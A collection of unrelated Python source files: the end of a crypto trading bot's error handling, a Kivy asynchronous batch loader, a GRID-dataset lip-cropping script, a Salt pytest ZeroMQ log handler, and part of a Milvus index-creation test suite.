READ_TIMEOUT_COUNT += 1 print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {READ_TIMEOUT_COUNT}\n{rt}{txcolors.DEFAULT}') except ConnectionError as ce: CONNECTION_ERROR_COUNT +=1 print(f'{txcolors.WARNING}We got a timeout error from from binance. Going to re-loop. Current Count: {CONNECTION_ERROR_COUNT}\n{ce}{txcolors.DEFAULT}') except (KeyboardInterrupt, SystemExit): # writes total session profit to activitylogs once session ended if TEST_MODE: log_session_profit("activitylogs/TEST_profit_losses") else: log_session_profit("activitylogs/LIVE_profit_losses")
batch_loader.py
import asyncio from logging import getLogger from threading import Thread from time import time from typing import Any, Callable, Dict, Iterable from kivy.clock import mainthread, Clock from kivy.event import EventDispatcher from kivy.uix.widget import Widget from tesseractXplore.app import get_app from tesseractXplore.widgets import ModelListItem, ImageMetaTile REPORT_RATE = 1 / 30 # Report progress to UI at 30 FPS logger = getLogger().getChild(__name__) class BatchRunner(EventDispatcher): """ Runs batches of tasks asynchronously in a separate thread from the main GUI thread Events: on_progress: Called periodically to report progress on_load: Called when a work item is processed on_complete: Called when all work items are processed """ def __init__(self, runner_callback: Callable, worker_callback: Callable, loop=None, **kwargs): """ Args: runner_callback: Callback for main event loop entry point worker_callback: Callback to process work items loop: Event loop to use (separate from main kivy event loop) """ # Schedule all events to run on the main thread self.dispatch = mainthread(self.dispatch) self.register_event_type('on_progress') self.register_event_type('on_load') self.register_event_type('on_complete') super().__init__(**kwargs) self.loop = loop or get_app().bg_loop self.thread = None self.queues = [] self.worker_tasks = [] self.runner_callback = runner_callback self.worker_callback = worker_callback def add_batch(self, items: Iterable, **kwargs: Dict): """ Add a batch of items to the queue (from another thread) Args: items: Items to be passed to worker callback kwargs: Optional keyword arguments to be passed to worker callback """ def _add_batch(): queue = asyncio.Queue() for item in items: queue.put_nowait((item, kwargs)) self.queues.append(queue) self.loop.call_soon_threadsafe(_add_batch) def start_thread(self): """ Start the background loader event loop in a new thread """ def _start(): asyncio.run_coroutine_threadsafe(self.start(), self.loop) tbatch = Thread(target=_start) # Need this to get killed when app closes tbatch.setDaemon(True) tbatch.start() async def start(self): """ Start the background loader event loop """ logger.info(f'Loader: Starting {len(self.queues)} batches') for queue in self.queues: task = asyncio.create_task(self.worker(queue)) self.worker_tasks.append(task) await self.runner_callback() async def worker(self, queue: asyncio.Queue): """ Run a worker to process items on a single queue """ while True: item, kwargs = await queue.get() results = await self.worker_callback(item, **kwargs) self.dispatch('on_load', results) queue.task_done() await asyncio.sleep(0) async def join(self): """ Wait for all queues to be initialized and then processed """ while not self.queues: await asyncio.sleep(0.1) for queue in self.queues: await queue.join() async def stop(self): """ Safely stop the event loop """ logger.info('Loader: stopping workers') for task in self.worker_tasks: task.cancel() self.loop.run_until_complete(asyncio.gather(*self.worker_tasks, return_exceptions=True)) # Default handlers def on_load(self, *_): pass def on_complete(self, *_): pass def on_progress(self, *_): pass class BatchLoader(BatchRunner): """ Loads batches of items with periodic progress updates sent back to the UI """ def __init__(self, **kwargs): super().__init__(runner_callback=self.run, **kwargs) self.event = None self.items_complete = None self.start_time = None self.lock = asyncio.Lock() async def run(self): """ Run batches, wait to complete, and gracefully shut down """ self.start_progress() await self.join() self.stop_progress() self.dispatch('on_complete', None) await self.stop() def start_progress(self): """ Schedule event to periodically report progress """ self.start_time = time() self.items_complete = 0 self.event = Clock.schedule_interval(self.report_progress, REPORT_RATE) async def increment_progress(self): """ Async-safe function to increment progress """ async with self.lock: self.items_complete += 1 def report_progress(self, *_): """ Report how many items have been loaded so far """ self.dispatch('on_progress', self.items_complete) def stop_progress(self): """ Unschedule progress event and log total execution time """ if self.event: self.event.cancel() self.event = None logger.info( f'Loader: Finished loading {self.items_complete} items ' f'in {time() - self.start_time} seconds' ) def cancel(self): """ Safely stop the event loop and thread (from another thread) """ logger.info(f'Loader: Canceling {len(self.queues)} batches') self.loop.call_soon_threadsafe(self.stop_progress) asyncio.run_coroutine_threadsafe(self.stop(), self.loop) class WidgetBatchLoader(BatchLoader): """ Generic loader for widgets that perform some sort of I/O on initialization """ def __init__(self, widget_cls, **kwargs): super().__init__(worker_callback=self.load_widget, **kwargs) self.widget_cls = widget_cls async def load_widget(self, item: Any, parent: Widget = None, **kwargs) -> Widget: """ Load information for a new widget """ logger.debug(f'Processing item: {item}') widget = self.widget_cls(item, **kwargs) self.add_widget(widget, parent) await self.increment_progress() return widget @mainthread def add_widget(self, widget: Widget, parent: Widget): """ Add a widget to its parent on the main thread """ if parent: parent.add_widget(widget) class ModelBatchLoader(WidgetBatchLoader): """ Loads batches of ModelListItems """ def __init__(self, **kwargs): super().__init__(widget_cls=ModelListItem, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add a ModelListItem to its parent list and bind its click event """ super().add_widget(widget, parent) mainthread(get_app().bind_to_select_model)(widget) class ImageBatchLoader(WidgetBatchLoader): """ Loads batches of ImageMetaTiles """ def __init__(self, **kwargs): super().__init__(widget_cls=ImageMetaTile, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add an ImageMetaTiles to its parent view and bind its click event """ super().add_widget(widget, parent) self.bind_click(widget) @mainthread def bind_click(self, widget): widget.bind(on_touch_down=get_app().image_selection_controller.on_image_click) class ImageBatchLoaderOnline(WidgetBatchLoader): """ Loads batches of ImageMetaTiles for online version""" def __init__(self, **kwargs): super().__init__(widget_cls=ImageMetaTile, **kwargs) def add_widget(self, widget: Widget, parent: Widget): """ Add an ImageMetaTiles to its parent view and bind its click event """ super().add_widget(widget, parent) self.bind_click(widget) @mainthread def bind_click(self, widget): widget.bind(on_touch_down=get_app().image_selection_online_controller.on_image_click)
extract_lip.py
import os import cv2 import glob import time import numpy as np from multiprocessing import Pool, Process, Queue def get_position(size, padding=0.25): x = [0.000213256, 0.0752622, 0.18113, 0.29077, 0.393397, 0.586856, 0.689483, 0.799124, 0.904991, 0.98004, 0.490127, 0.490127, 0.490127, 0.490127, 0.36688, 0.426036, 0.490127, 0.554217, 0.613373, 0.121737, 0.187122, 0.265825, 0.334606, 0.260918, 0.182743, 0.645647, 0.714428, 0.793132, 0.858516, 0.79751, 0.719335, 0.254149, 0.340985, 0.428858, 0.490127, 0.551395, 0.639268, 0.726104, 0.642159, 0.556721, 0.490127, 0.423532, 0.338094, 0.290379, 0.428096, 0.490127, 0.552157, 0.689874, 0.553364, 0.490127, 0.42689] y = [0.106454, 0.038915, 0.0187482, 0.0344891, 0.0773906, 0.0773906, 0.0344891, 0.0187482, 0.038915, 0.106454, 0.203352, 0.307009, 0.409805, 0.515625, 0.587326, 0.609345, 0.628106, 0.609345, 0.587326, 0.216423, 0.178758, 0.179852, 0.231733, 0.245099, 0.244077, 0.231733, 0.179852, 0.178758, 0.216423, 0.244077, 0.245099, 0.780233, 0.745405, 0.727388, 0.742578, 0.727388, 0.745405, 0.780233, 0.864805, 0.902192, 0.909281, 0.902192, 0.864805, 0.784792, 0.778746, 0.785343, 0.778746, 0.784792, 0.824182, 0.831803, 0.824182] x, y = np.array(x), np.array(y) x = (x + padding) / (2 * padding + 1) y = (y + padding) / (2 * padding + 1) x = x * size y = y * size return np.array(list(zip(x, y))) def cal_area(anno): return (anno[:,0].max() - anno[:,0].min()) * (anno[:,1].max() - anno[:,1].min()) def transformation_from_points(points1, points2): points1 = points1.astype(np.float64) points2 = points2.astype(np.float64) c1 = np.mean(points1, axis=0) c2 = np.mean(points2, axis=0) points1 -= c1 points2 -= c2 s1 = np.std(points1) s2 = np.std(points2) points1 /= s1 points2 /= s2 U, S, Vt = np.linalg.svd(points1.T * points2) R = (U * Vt).T return np.vstack([np.hstack(((s2 / s1) * R, c2.T - (s2 / s1) * R * c1.T)), np.matrix([0., 0., 1.])]) def anno_img(img_dir, anno_dir, save_dir): files = list(os.listdir(img_dir)) files = [file for file in files if(file.find('.jpg') != -1)] shapes = [] for file in files: img = os.path.join(img_dir, file) anno = os.path.join(anno_dir, file).replace('.jpg', '.txt') I = cv2.imread(img) count = 0 with open(anno, 'r') as f: annos = [line.strip().split('\t') for line in f.readlines()] if(len(annos) == 0): continue for (i, anno) in enumerate(annos): x, y = [], [] for p in anno: _, __ = p[1:-1].split(',') _, __ = float(_), float(__) x.append(_) y.append(__) annos[i] = np.stack([x, y], 1) anno = sorted(annos, key = cal_area, reverse=True)[0] shape = [] shapes.append(anno[17:]) front256 = get_position(256) M_prev = None for (shape, file) in zip(shapes, files): img = os.path.join(img_dir, file) I = cv2.imread(img) M = transformation_from_points(np.matrix(shape), np.matrix(front256)) img = cv2.warpAffine(I, M[:2], (256, 256)) (x, y) = front256[-20:].mean(0).astype(np.int32) w = 160//2 img = img[y-w//2:y+w//2,x-w:x+w,...] cv2.imwrite(os.path.join(save_dir, file), img) def run(files): tic = time.time() count = 0 print('n_files:{}'.format(len(files))) for (img_dir, anno_dir, save_dir) in files: anno_img(img_dir, anno_dir, save_dir) count += 1 if(count % 1000 == 0): print('eta={}'.format((time.time()-tic)/(count) * (len(files) - count) / 3600.0)) if(__name__ == '__main__'): with open('paths.txt', 'r') as f: data = [line.strip() for line in f.readlines()] data = list(set([os.path.split(file)[0] for file in data])) annos = [name.replace('GRID_imgs/', 'GRID/landmarks/') for name in data] targets = [name.replace('GRID_imgs/', 'GRID/lip/') for name in data] for dst in targets: if(not os.path.exists(dst)): os.makedirs(dst) data = list(zip(data, annos, targets)) processes = [] n_p = 4 bs = len(data) // n_p for i in range(n_p): if(i == n_p - 1): bs = len(data) p = Process(target=run, args=(data[:bs],)) data = data[bs:] p.start() processes.append(p) assert(len(data) == 0) for p in processes: p.join()
pytest_log_handler.py
# -*- coding: utf-8 -*- """ pytestsalt.salt.log_handlers.pytest_log_handler ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Salt External Logging Handler """ import atexit import copy import logging import os import pprint import socket import sys import threading import traceback import salt.utils.msgpack import salt.utils.stringutils from salt._logging.impl import LOG_LEVELS from salt._logging.mixins import ExcInfoOnLogLevelFormatMixin from salt._logging.mixins import NewStyleClassMixin from salt.utils.zeromq import zmq __virtualname__ = "pytest_log_handler" log = logging.getLogger(__name__) def __virtual__(): role = __opts__["__role"] pytest_key = "pytest-{}".format(role) pytest_config = __opts__[pytest_key] if "log" not in pytest_config: return False, "No 'log' key in opts {} dictionary".format(pytest_key) log_opts = pytest_config["log"] if "port" not in log_opts: return ( False, "No 'port' key in opts['pytest']['log'] or opts['pytest'][{}]['log']".format( __opts__["role"] ), ) if salt.utils.msgpack.HAS_MSGPACK is False: return False, "msgpack was not importable. Please install msgpack." if zmq is None: return False, "zmq was not importable. Please install pyzmq." return True def setup_handlers(): role = __opts__["__role"] pytest_key = "pytest-{}".format(role) pytest_config = __opts__[pytest_key] log_opts = __opts__[pytest_key]["log"] host_addr = log_opts.get("host") if not host_addr: import subprocess if log_opts["pytest_windows_guest"] is True: proc = subprocess.Popen("ipconfig", stdout=subprocess.PIPE) for line in proc.stdout.read().strip().encode(__salt_system_encoding__).splitlines(): if "Default Gateway" in line: parts = line.split() host_addr = parts[-1] break else: proc = subprocess.Popen( "netstat -rn | grep -E '^0.0.0.0|default' | awk '{ print $2 }'", shell=True, stdout=subprocess.PIPE, ) host_addr = proc.stdout.read().strip().encode(__salt_system_encoding__) host_port = log_opts["port"] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((host_addr, host_port)) except socket.error as exc: # Don't even bother if we can't connect log.warning("Cannot connect back to log server: %s", exc) return finally: sock.close() pytest_log_prefix = log_opts.get("prefix") level = LOG_LEVELS[(log_opts.get("level") or "error").lower()] handler = ZMQHandler(host=host_addr, port=host_port, log_prefix=pytest_log_prefix, level=level) handler.setLevel(level) handler.start() return handler class ZMQHandler(ExcInfoOnLogLevelFormatMixin, logging.Handler, NewStyleClassMixin): # We offload sending the log records to the consumer to a separate # thread because PUSH socket's WILL block if the receiving end can't # receive fast engough, thus, also blocking the main thread. # # To achive this, we create an inproc zmq.PAIR, which also guarantees # message delivery, but should be way faster than the PUSH. # We also set some high enough high water mark values to cope with the # message flooding. # # We also implement a start method which is deferred until sending the # first message because, logging handlers, on platforms which support # forking, are inherited by forked processes, and we don't want the ZMQ # machinery inherited. # For the cases where the ZMQ machinery is still inherited because a # process was forked after ZMQ has been prep'ed up, we check the handler's # pid attribute against, the current process pid. If it's not a match, we # reconnect the ZMQ machinery. def __init__(self, host="127.0.0.1", port=3330, log_prefix=None, level=logging.NOTSET): super().__init__(level=level) self.pid = os.getpid() self.push_address = "tcp://{}:{}".format(host, port) self.log_prefix = self._get_log_prefix(log_prefix) self.context = self.proxy_address = self.in_proxy = self.proxy_thread = None self._exiting = False def _get_log_prefix(self, log_prefix): if log_prefix is None: return if sys.argv[0] == sys.executable: cli_arg_idx = 1 else: cli_arg_idx = 0 cli_name = os.path.basename(sys.argv[cli_arg_idx]) return log_prefix.format(cli_name=cli_name) def start(self): if self.pid != os.getpid(): self.stop() self._exiting = False if self._exiting is True: return if self.in_proxy is not None: return atexit.register(self.stop) context = in_proxy = None try: context = zmq.Context() self.context = context except zmq.ZMQError as exc: sys.stderr.write( "Failed to create the ZMQ Context: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() # Let's start the proxy thread socket_bind_event = threading.Event() self.proxy_thread = threading.Thread( target=self._proxy_logs_target, args=(socket_bind_event,) ) self.proxy_thread.daemon = True self.proxy_thread.start() # Now that we discovered which random port to use, lest's continue with the setup if socket_bind_event.wait(5) is not True: sys.stderr.write("Failed to bind the ZMQ socket PAIR\n") sys.stderr.flush() context.term() return # And we can now also connect the messages input side of the proxy try: in_proxy = self.context.socket(zmq.PAIR) in_proxy.set_hwm(100000) in_proxy.connect(self.proxy_address) self.in_proxy = in_proxy except zmq.ZMQError as exc: if in_proxy is not None: in_proxy.close(1000) sys.stderr.write( "Failed to bind the ZMQ PAIR socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() def stop(self): if self._exiting: return self._exiting = True try: atexit.unregister(self.stop) except AttributeError: # Python 2 try: atexit._exithandlers.remove((self.stop, (), {})) except ValueError: # The exit handler isn't registered pass try: if self.in_proxy is not None: self.in_proxy.send(salt.utils.msgpack.dumps(None)) self.in_proxy.close(1500) if self.context is not None: self.context.term() if self.proxy_thread is not None and self.proxy_thread.is_alive(): self.proxy_thread.join(5) except Exception as exc: # pylint: disable=broad-except sys.stderr.write( "Failed to terminate ZMQHandler: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() raise finally: self.context = self.in_proxy = self.proxy_address = self.proxy_thread = None def format(self, record): msg = super().format(record) if self.log_prefix: import salt.utils.stringutils msg = "[{}] {}".format( salt.utils.stringutils.to_unicode(self.log_prefix), salt.utils.stringutils.to_unicode(msg), ) return msg def prepare(self, record): msg = self.format(record) record = copy.copy(record) record.msg = msg # Reduce network bandwidth, we don't need these any more record.args = None record.exc_info = None record.exc_text = None record.message = None # redundant with msg # On Python >= 3.5 we also have stack_info, but we've formatted altready so, reset it record.stack_info = None try: return salt.utils.msgpack.dumps(record.__dict__, use_bin_type=True) except TypeError as exc: # Failed to serialize something with msgpack logging.getLogger(__name__).error( "Failed to serialize log record: %s.\n%s", exc, pprint.pformat(record.__dict__) ) self.handleError(record) def emit(self, record): """ Emit a record. Writes the LogRecord to the queue, preparing it for pickling first. """ # Python's logging machinery acquires a lock before calling this method # that's why it's safe to call the start method wihtout an explicit acquire if self._exiting: return self.start() if self.in_proxy is None: sys.stderr.write( "Not sending log message over the wire because " "we were unable to properly configure a ZMQ PAIR socket.\n" ) sys.stderr.flush() return try: msg = self.prepare(record) self.in_proxy.send(msg) except SystemExit: pass except Exception: # pylint: disable=broad-except self.handleError(record) def _proxy_logs_target(self, socket_bind_event): context = zmq.Context() out_proxy = pusher = None try: out_proxy = context.socket(zmq.PAIR) out_proxy.set_hwm(100000) proxy_port = out_proxy.bind_to_random_port("tcp://127.0.0.1") self.proxy_address = "tcp://127.0.0.1:{}".format(proxy_port) except zmq.ZMQError as exc: if out_proxy is not None: out_proxy.close(1000) context.term() sys.stderr.write( "Failed to bind the ZMQ PAIR socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() return try: pusher = context.socket(zmq.PUSH) pusher.set_hwm(100000) pusher.connect(self.push_address) except zmq.ZMQError as exc: if pusher is not None: pusher.close(1000) context.term() sys.stderr.write( "Failed to connect the ZMQ PUSH socket: {}\n{}\n".format( exc, traceback.format_exc(exc) ) ) sys.stderr.flush() socket_bind_event.set() sentinel = salt.utils.msgpack.dumps(None) while True: try: msg = out_proxy.recv() if msg == sentinel: # Received sentinel to stop break pusher.send(msg) except zmq.ZMQError as exc: sys.stderr.write( "Failed to proxy log message: {}\n{}\n".format(exc, traceback.format_exc(exc)) ) sys.stderr.flush() break # Close the receiving end of the PAIR proxy socket out_proxy.close(0) # Allow, the pusher queue to send any messsges in it's queue for # the next 1.5 seconds pusher.close(1500) context.term()
test_index.py
import logging import time import pdb import copy import threading from multiprocessing import Pool, Process import numpy import pytest import sklearn.preprocessing from utils import * from constants import * uid = "test_index" BUILD_TIMEOUT = 300 field_name = default_float_vec_field_name binary_field_name = default_binary_vec_field_name query, query_vecs = gen_query_vectors(field_name, default_entities, default_top_k, 1) default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"} class TestIndexBase: @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): logging.getLogger().info(request.param) # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) @pytest.fixture( scope="function", params=[ 1, 10, 1111 ], ) def get_nq(self, request): yield request.param """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index on field not existed expected: error raised ''' tmp_field_name = gen_unique_str() ids = connect.insert(collection, default_entities) with pytest.raises(Exception) as e: connect.create_index(collection, tmp_field_name, get_simple_index) @pytest.mark.level(2) def test_create_index_on_field(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index on other field expected: error raised ''' tmp_field_name = "int64" ids = connect.insert(collection, default_entities) with pytest.raises(Exception) as e: connect.create_index(collection, tmp_field_name, get_simple_index) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_flush(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) connect.flush([collection]) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index def test_create_index_without_connect(self, dis_connect, collection): ''' target: test create index without connection method: create collection and add entities in it, check if added successfully expected: raise exception ''' with pytest.raises(Exception) as e: dis_connect.create_index(collection, field_name, get_simple_index) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) connect.create_index(collection, field_name, get_simple_index) logging.getLogger().info(connect.describe_index(collection, "")) nq = get_nq index_type = get_simple_index["index_type"] search_param = get_search_param(index_type) query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, search_params=search_param) connect.load_collection(collection) res = connect.search(collection, query) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) @pytest.mark.level(2) def test_create_index_multithread(self, connect, collection, args): ''' target: test create index interface with multiprocess method: create collection and add entities in it, create index expected: return search success ''' connect.insert(collection, default_entities) def build(connect): connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index threads_num = 8 threads = [] for i in range(threads_num): m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"]) t = MyThread(target=build, args=(m,)) threads.append(t) t.start() time.sleep(0.2) for t in threads: t.join() @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_index_collection_not_existed(self, connect): ''' target: test create index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index expected: create index failed ''' collection_name = gen_unique_str(uid) with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_insert_flush(self, connect, collection, get_simple_index): ''' target: test create index method: create collection and create index, add entities in it expected: create index ok, and count correct ''' connect.create_index(collection, field_name, get_simple_index) ids = connect.insert(collection, default_entities) connect.flush([collection]) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_same_index_repeatedly(self, connect, collection, get_simple_index): ''' target: check if index can be created repeatedly, with the same create_index params method: create index after index have been built expected: return code success, and search ok ''' connect.create_index(collection, field_name, get_simple_index) connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) indexs = [default_index, {"metric_type":"L2", "index_type": "FLAT", "params":{"nlist": 1024}}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") # assert index == indexs[-1] assert not index # FLAT is the last index_type, drop all indexes in server @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly_B(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) indexs = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") create_target_index(indexs[-1], field_name) assert index == indexs[-1] # assert not index # FLAT is the last index_type, drop all indexes in server @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(collection, default_tag) ids = connect.insert(collection, default_entities, partition_tag=default_tag) connect.flush([collection]) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) if get_simple_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(get_simple_index, field_name) assert index == get_simple_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' metric_type = "IP" ids = connect.insert(collection, default_entities) connect.flush([collection]) get_simple_index["metric_type"] = metric_type connect.create_index(collection, field_name, get_simple_index) connect.load_collection(collection) logging.getLogger().info(connect.describe_index(collection, "")) nq = get_nq index_type = get_simple_index["index_type"] search_param = get_search_param(index_type) query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq, metric_type=metric_type, search_params=search_param) res = connect.search(collection, query) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) @pytest.mark.level(2) def test_create_index_multithread_ip(self, connect, collection, args): ''' target: test create index interface with multiprocess method: create collection and add entities in it, create index expected: return search success ''' connect.insert(collection, default_entities) def build(connect): default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index threads_num = 8 threads = [] for i in range(threads_num): m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"]) t = MyThread(target=build, args=(m,)) threads.append(t) t.start() time.sleep(0.2) for t in threads: t.join() def test_create_index_collection_not_existed_ip(self, connect, collection): ''' target: test create index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index expected: return code not equals to 0, create index failed ''' collection_name = gen_unique_str(uid) default_index["metric_type"] = "IP" with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_no_vectors_insert_ip(self, connect, collection): ''' target: test create index interface when there is no vectors in collection, and does not affect the subsequent process method: create collection and add no vectors in it, and then create index, add entities in it expected: return code equals to 0 ''' default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) ids = connect.insert(collection, default_entities) connect.flush([collection]) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_same_index_repeatedly_ip(self, connect, collection): ''' target: check if index can be created repeatedly, with the same create_index params method: create index after index have been built expected: return code success, and search ok ''' default_index["metric_type"] = "IP" connect.create_index(collection, field_name, default_index) connect.create_index(collection, field_name, default_index) if default_index["index_type"] != "FLAT": index = connect.describe_index(collection, "") create_target_index(default_index, field_name) assert index == default_index @pytest.mark.level(2) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_different_index_repeatedly_ip(self, connect, collection): ''' target: check if index can be created repeatedly, with the different create_index params method: create another index with different index_params after index have been built expected: return code 0, and describe index result equals with the second index params ''' ids = connect.insert(collection, default_entities) connect.flush([collection]) connect.load_collection(collection) stats = connect.get_collection_stats(collection) assert stats["row_count"] == default_nb default_index["metric_type"] = "IP" indexs = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}] for index in indexs: connect.create_index(collection, field_name, index) connect.release_collection(collection) connect.load_collection(collection) index = connect.describe_index(collection, "") # assert index == indexs[-1] assert not index """ ****************************************************************** The following cases are used to test `drop_index` function ****************************************************************** """ @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index(self, connect, collection, get_simple_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' # ids = connect.insert(collection, entities) connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_repeatedly(self, connect, collection, get_simple_index): ''' target: test drop index repeatedly method: create index, call drop index, and drop again expected: return code 0 ''' connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) 